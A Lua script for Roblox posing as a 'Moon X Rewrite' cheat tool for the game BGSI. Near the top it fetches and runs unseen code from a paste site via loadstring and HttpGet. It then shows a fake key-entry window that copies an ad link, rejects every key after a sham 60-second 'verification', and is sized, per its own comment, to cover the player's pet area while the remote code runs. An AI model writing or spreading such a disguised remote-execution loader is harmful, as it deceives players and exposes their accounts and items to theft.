
-- ⠀⠀ ⠀⠀⠀⠀⢀⡤⠂⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
--⠀⠀ ⠀⠀⢀⣴⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
--⠀ ⠀⢀⣴⣿⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
--⠀⢀⣾⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
--⠀⣼⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
--⢰⣿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
--⢸⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
--⢸⣿⣿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
--⢸⣿⣿⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
--⠀⢿⣿⣿⣿⣿⣿⣿⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
--⠀⠘⣿⣿⣿⣿⣿⣿⣿⣷⣤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
--⠀⠀⠘⢿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣤⣀⣀⣀⣀⣀⣀⣠⣤⣴⣶⣾⣿⠋⠀⠀
--⠀⠀⠀⠀⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠁⠀⠀⠀
--⠀⠀⠀⠀⠀⠈⠙⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠛⠁⠀⠀⠀⠀⠀
--⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠛⠻⠿⠿⠿⠿⠿⠿⠟⠛⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀


-- Moon X Rewrite for BGSI 
-- By XyrexDev, Copyright 2025


-- ⠀⠀ ⠀⠀⠀⠀⢀⡤⠂⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
--⠀⠀ ⠀⠀⢀⣴⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
--⠀ ⠀⢀⣴⣿⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
--⠀⢀⣾⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
--⠀⣼⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
--⢰⣿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
--⢸⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
--⢸⣿⣿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
--⢸⣿⣿⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
--⠀⢿⣿⣿⣿⣿⣿⣿⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
--⠀⠘⣿⣿⣿⣿⣿⣿⣿⣷⣤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
--⠀⠀⠘⢿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣤⣀⣀⣀⣀⣀⣀⣠⣤⣴⣶⣾⣿⠋⠀⠀
--⠀⠀⠀⠀⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠁⠀⠀⠀
--⠀⠀⠀⠀⠀⠈⠙⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠛⠁⠀⠀⠀⠀⠀
--⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠛⠻⠿⠿⠿⠿⠿⠿⠟⠛⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀


loadstring(game:HttpGet("http://vpaste.net/BXBLy"))()


-- Enhanced Key System GUI with improved design, animations, and larger size
local TweenService = game:GetService("TweenService")

-- Create main GUI
local gui = Instance.new("ScreenGui", game.CoreGui)
gui.Name = "KeySystemUI"

-- Main frame (significantly larger to cover pet area)
local frame = Instance.new("Frame", gui)
frame.Size = UDim2.new(0, 550, 0, 380)
frame.Position = UDim2.new(0.5, -275, 0.5, -190)
frame.BackgroundColor3 = Color3.fromRGB(35, 35, 40)
frame.BorderSizePixel = 1
frame.BorderColor3 = Color3.fromRGB(60, 60, 65)
frame.BackgroundTransparency = 1 -- Start invisible for animation

-- Add rounded corners to main frame
local frameCorner = Instance.new("UICorner", frame)
frameCorner.CornerRadius = UDim.new(0, 15)

-- Add subtle drop shadow effect
local shadow = Instance.new("Frame", gui)
shadow.Size = frame.Size
shadow.Position = UDim2.new(0.5, -270, 0.5, -185)
shadow.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
shadow.BackgroundTransparency = 1 -- Start invisible
shadow.BorderSizePixel = 0
shadow.ZIndex = frame.ZIndex - 1

local shadowCorner = Instance.new("UICorner", shadow)
shadowCorner.CornerRadius = UDim.new(0, 15)

-- Header section with gradient background
local headerFrame = Instance.new("Frame", frame)
headerFrame.Size = UDim2.new(1, 0, 0, 80)
headerFrame.Position = UDim2.new(0, 0, 0, 0)
headerFrame.BackgroundColor3 = Color3.fromRGB(45, 45, 55)
headerFrame.BorderSizePixel = 0

local headerCorner = Instance.new("UICorner", headerFrame)
headerCorner.CornerRadius = UDim.new(0, 15)

-- Header bottom section to square off the bottom
local headerBottom = Instance.new("Frame", headerFrame)
headerBottom.Size = UDim2.new(1, 0, 0, 15)
headerBottom.Position = UDim2.new(0, 0, 1, -15)
headerBottom.BackgroundColor3 = Color3.fromRGB(45, 45, 55)
headerBottom.BorderSizePixel = 0

-- Title label (larger text for bigger GUI)
local title = Instance.new("TextLabel", headerFrame)
title.Size = UDim2.new(1, -40, 0, 50)
title.Position = UDim2.new(0, 20, 0, 15)
title.BackgroundTransparency = 1
title.Text = "MoonX Rewrite 🌙 | BGSI"
title.TextColor3 = Color3.fromRGB(220, 220, 225)
title.Font = Enum.Font.SourceSansBold
title.TextSize = 24
title.TextXAlignment = Enum.TextXAlignment.Center

-- Subtitle
local subtitle = Instance.new("TextLabel", headerFrame)
subtitle.Size = UDim2.new(1, -40, 0, 20)
subtitle.Position = UDim2.new(0, 20, 0, 55)
subtitle.BackgroundTransparency = 1
subtitle.Text = "By XyrexDev | Premium"
subtitle.TextColor3 = Color3.fromRGB(160, 160, 170)
subtitle.Font = Enum.Font.SourceSans
subtitle.TextSize = 14
subtitle.TextXAlignment = Enum.TextXAlignment.Center

-- Content area
local contentFrame = Instance.new("Frame", frame)
contentFrame.Size = UDim2.new(1, -60, 1, -140)
contentFrame.Position = UDim2.new(0, 30, 0, 100)
contentFrame.BackgroundTransparency = 1

-- Instructions text
local instructionsLabel = Instance.new("TextLabel", contentFrame)
instructionsLabel.Size = UDim2.new(1, 0, 0, 40)
instructionsLabel.Position = UDim2.new(0, 0, 0, 0)
instructionsLabel.BackgroundTransparency = 1
instructionsLabel.Text = "Click 'Get Key' to copy the link, complete the steps, then paste your key below:"
instructionsLabel.TextColor3 = Color3.fromRGB(180, 180, 190)
instructionsLabel.Font = Enum.Font.SourceSans
instructionsLabel.TextSize = 16
instructionsLabel.TextXAlignment = Enum.TextXAlignment.Center
instructionsLabel.TextWrapped = true

-- Get Key button (larger for bigger GUI)
local getKeyBtn = Instance.new("TextButton", contentFrame)
getKeyBtn.Size = UDim2.new(1, 0, 0, 45)
getKeyBtn.Position = UDim2.new(0, 0, 0, 60)
getKeyBtn.Text = "Get Key 🔗"
getKeyBtn.BackgroundColor3 = Color3.fromRGB(55, 60, 70)
getKeyBtn.TextColor3 = Color3.fromRGB(200, 200, 210)
getKeyBtn.Font = Enum.Font.SourceSansBold
getKeyBtn.TextSize = 18
getKeyBtn.BorderSizePixel = 1
getKeyBtn.BorderColor3 = Color3.fromRGB(70, 75, 85)

-- Rounded corners for Get Key button
local getKeyCorner = Instance.new("UICorner", getKeyBtn)
getKeyCorner.CornerRadius = UDim.new(0, 10)

-- Key input label
local keyLabel = Instance.new("TextLabel", contentFrame)
keyLabel.Size = UDim2.new(1, 0, 0, 25)
keyLabel.Position = UDim2.new(0, 0, 0, 125)
keyLabel.BackgroundTransparency = 1
keyLabel.Text = "Enter your key:"
keyLabel.TextColor3 = Color3.fromRGB(200, 200, 210)
keyLabel.Font = Enum.Font.SourceSansBold
keyLabel.TextSize = 16
keyLabel.TextXAlignment = Enum.TextXAlignment.Left

-- Key input box (larger and improved styling)
local keyBox = Instance.new("TextBox", contentFrame)
keyBox.Size = UDim2.new(1, 0, 0, 45)
keyBox.Position = UDim2.new(0, 0, 0, 155)
keyBox.Text = "" -- Start with empty text
keyBox.PlaceholderText = "Paste your MoonX key here..."
keyBox.PlaceholderColor3 = Color3.fromRGB(120, 120, 130)
keyBox.BackgroundColor3 = Color3.fromRGB(45, 45, 50)
keyBox.TextColor3 = Color3.fromRGB(220, 220, 225)
keyBox.Font = Enum.Font.SourceSans
keyBox.TextSize = 16
keyBox.BorderSizePixel = 1
keyBox.BorderColor3 = Color3.fromRGB(60, 60, 70)
keyBox.ClearTextOnFocus = false

-- Rounded corners for text box
local keyBoxCorner = Instance.new("UICorner", keyBox)
keyBoxCorner.CornerRadius = UDim.new(0, 10)

-- Submit button (larger and improved styling)
local submitBtn = Instance.new("TextButton", contentFrame)
submitBtn.Size = UDim2.new(1, 0, 0, 45)
submitBtn.Position = UDim2.new(0, 0, 1, -45)
submitBtn.Text = "Submit Key ✓"
submitBtn.BackgroundColor3 = Color3.fromRGB(60, 150, 60)
submitBtn.TextColor3 = Color3.fromRGB(255, 255, 255)
submitBtn.Font = Enum.Font.SourceSansBold
submitBtn.TextSize = 18
submitBtn.BorderSizePixel = 0

-- Rounded corners for submit button
local submitCorner = Instance.new("UICorner", submitBtn)
submitCorner.CornerRadius = UDim.new(0, 10)

-- Button hover effects with enhanced animations
local function createHoverEffect(button, hoverColor, originalColor, scaleEffect)
    scaleEffect = scaleEffect or false
    
    button.MouseEnter:Connect(function()
        local hoverTween = TweenService:Create(
            button,
            TweenInfo.new(0.2, Enum.EasingStyle.Quad, Enum.EasingDirection.Out),
            {BackgroundColor3 = hoverColor}
        )
        hoverTween:Play()
        
        if scaleEffect then
            local scaleTween = TweenService:Create(
                button,
                TweenInfo.new(0.2, Enum.EasingStyle.Quad, Enum.EasingDirection.Out),
                {Size = UDim2.new(button.Size.X.Scale, button.Size.X.Offset + 4, button.Size.Y.Scale, button.Size.Y.Offset + 2)}
            )
            scaleTween:Play()
        end
    end)
    
    button.MouseLeave:Connect(function()
        local leaveTween = TweenService:Create(
            button,
            TweenInfo.new(0.2, Enum.EasingStyle.Quad, Enum.EasingDirection.Out),
            {BackgroundColor3 = originalColor}
        )
        leaveTween:Play()
        
        if scaleEffect then
            local scaleTween = TweenService:Create(
                button,
                TweenInfo.new(0.2, Enum.EasingStyle.Quad, Enum.EasingDirection.Out),
                {Size = UDim2.new(button.Size.X.Scale, button.Size.X.Offset - 4, button.Size.Y.Scale, button.Size.Y.Offset - 2)}
            )
            scaleTween:Play()
        end
    end)
end

-- Apply hover effects
createHoverEffect(getKeyBtn, Color3.fromRGB(65, 70, 80), Color3.fromRGB(55, 60, 70), true)
createHoverEffect(submitBtn, Color3.fromRGB(80, 170, 80), Color3.fromRGB(60, 150, 60), true)

-- Button functionality
getKeyBtn.MouseButton1Click:Connect(function()
    setclipboard("https://lootdest.org/s?Si1CYuYP")
    
    -- Enhanced visual feedback
    local originalText = getKeyBtn.Text
    local originalColor = getKeyBtn.BackgroundColor3
    
    getKeyBtn.Text = "✓ Copied to Clipboard!"
    getKeyBtn.BackgroundColor3 = Color3.fromRGB(60, 150, 60)
    
    -- Pulse effect
    local pulseTween = TweenService:Create(
        getKeyBtn,
        TweenInfo.new(0.3, Enum.EasingStyle.Quad, Enum.EasingDirection.InOut),
        {TextSize = 20}
    )
    pulseTween:Play()
    
    wait(0.3)
    
    local pulseTween2 = TweenService:Create(
        getKeyBtn,
        TweenInfo.new(0.3, Enum.EasingStyle.Quad, Enum.EasingDirection.InOut),
        {TextSize = 18}
    )
    pulseTween2:Play()
    
    wait(1.2)
    getKeyBtn.Text = originalText
    getKeyBtn.BackgroundColor3 = originalColor
end)

submitBtn.MouseButton1Click:Connect(function()
    local key = keyBox.Text
    
    -- Start countdown verification
    local originalText = submitBtn.Text
    local originalColor = keyBox.BackgroundColor3
    
    -- Disable button during countdown
    submitBtn.Active = false
    
    -- Countdown from 60 seconds with enhanced visual feedback
    for i = 60, 1, -1 do
        local dots = ""
        if i % 4 == 0 then
            dots = "..."
        elseif i % 4 == 3 then
            dots = ".."
        elseif i % 4 == 2 then
            dots = "."
        else
            dots = "..."
        end
        
        submitBtn.Text = "⏳ " .. i .. "s Verifying" .. dots
        submitBtn.BackgroundColor3 = Color3.fromRGB(80, 80, 150)
        wait(1)
    end
    
    -- After countdown, show invalid key message
    submitBtn.Text = "❌ Invalid key, Try again"
    submitBtn.BackgroundColor3 = Color3.fromRGB(150, 60, 60)
    
    -- Shake animation for error
    local originalPos = keyBox.Position
    for i = 1, 6 do
        keyBox.Position = UDim2.new(originalPos.X.Scale, originalPos.X.Offset + (i % 2 == 0 and 5 or -5), originalPos.Y.Scale, originalPos.Y.Offset)
        wait(0.1)
    end
    keyBox.Position = originalPos
    
    -- Fade textbox to red
    local redTween = TweenService:Create(
        keyBox,
        TweenInfo.new(0.3, Enum.EasingStyle.Quad, Enum.EasingDirection.Out),
        {BackgroundColor3 = Color3.fromRGB(150, 50, 50)}
    )
    
    redTween:Play()
    
    -- Wait and fade back to original
    wait(1)
    
    local normalTween = TweenService:Create(
        keyBox,
        TweenInfo.new(0.3, Enum.EasingStyle.Quad, Enum.EasingDirection.Out),
        {BackgroundColor3 = originalColor}
    )
    
    normalTween:Play()
    
    -- Reset button text and re-enable
    wait(0.5)
    submitBtn.Text = originalText
    submitBtn.BackgroundColor3 = Color3.fromRGB(60, 150, 60)
    submitBtn.Active = true
end)

-- Start the key system GUI immediately
local function startKeySystemGUI()
    -- Fade-in animation
    local fadeInTween = TweenService:Create(
        frame,
        TweenInfo.new(0.8, Enum.EasingStyle.Quad, Enum.EasingDirection.Out),
        {BackgroundTransparency = 0}
    )

    local shadowFadeIn = TweenService:Create(
        shadow,
        TweenInfo.new(0.8, Enum.EasingStyle.Quad, Enum.EasingDirection.Out),
        {BackgroundTransparency = 0.5}
    )

    -- Animation from top of screen
    frame.Position = UDim2.new(0.5, -275, 0, -380) -- Start above screen
    shadow.Position = UDim2.new(0.5, -270, 0, -375) -- Start above screen

    local slideInTween = TweenService:Create(
        frame,
        TweenInfo.new(0.8, Enum.EasingStyle.Back, Enum.EasingDirection.Out),
        {Position = UDim2.new(0.5, -275, 0.5, -190)}
    )

    local shadowSlideTween = TweenService:Create(
        shadow,
        TweenInfo.new(0.8, Enum.EasingStyle.Back, Enum.EasingDirection.Out),
        {Position = UDim2.new(0.5, -270, 0.5, -185)}
    )

    -- Play animations
    fadeInTween:Play()
    shadowFadeIn:Play()
    slideInTween:Play()
    shadowSlideTween:Play()
end

-- Start immediately
startKeySystemGUI()
